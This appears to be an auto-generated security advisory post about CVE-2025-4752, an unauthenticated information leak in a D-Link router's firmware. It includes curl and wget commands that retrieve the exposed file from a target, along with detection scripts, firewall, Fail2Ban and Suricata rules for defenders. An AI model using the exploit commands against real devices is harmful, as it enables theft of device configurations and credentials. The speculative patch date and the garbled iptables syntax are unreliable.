D-Link DI-7003GV2, Information Disclosure, CVE-2025-4752 (Medium)

By /

Listen to this Post

How CVE-2025-4752 Works

The vulnerability in D-Link DI-7003GV2 firmware version 24.04.18D1 R(68125) stems from improper access control in the `/install_base.data` file. Attackers can remotely exploit this flaw to retrieve sensitive system information without authentication. The file, intended for installation configuration, inadvertently exposes internal data due to insufficient permission checks. When accessed via crafted HTTP requests, it leaks details such as device configurations, network parameters, or credentials. The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N/VC:L) confirms the attack requires no user interaction and exploits low-complexity network vectors. Publicly disclosed PoCs demonstrate trivial exploitation, increasing its risk profile.

DailyCVE Form

Platform: D-Link DI-7003GV2
Version: 24.04.18D1 R(68125)
Vulnerability: Information Disclosure
Severity: Medium
Date: 06/03/2025

Prediction: Patch expected by 07/15/2025

What Undercode Say:

Analytics:

  • Exploit likelihood: High due to public PoC availability.
  • Attack surface: Remote, unauthenticated.
  • Impact: Leaked credentials/configs enable further attacks.

Exploit Commands:

curl -X GET http://<TARGET_IP>/install_base.data -o leaked_data.txt
wget http://<TARGET_IP>/install_base.data

Detection Script (Python):

import requests
response = requests.get("http://<TARGET_IP>/install_base.data")
if response.status_code == 200 and "config" in response.text:
print("[!] Vulnerable to CVE-2025-4752")

Mitigation Steps:

1. Block external access to `/install_base.data` via firewall:

“`iptables -A INPUT -p tcp –dport 80 -m string –string “/install_base.data” –algo bm -j DROP“`

2. Apply firmware update post-patch release.

3. Restrict HTTP admin interface to trusted IPs.

Patch Verification:

md5sum /etc/www/install_base.data Compare with post-patch hash.

Log Monitoring (Fail2Ban):

[bash]
failregex = ^<HOST>.GET./install_base.data

Network Detection (Suricata):

alert http any any -> $HOME_NET any (msg:"CVE-2025-4752 Exploit Attempt"; flow:to_server; http.uri; content:"/install_base.data"; nocase; sid:1004752;)

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top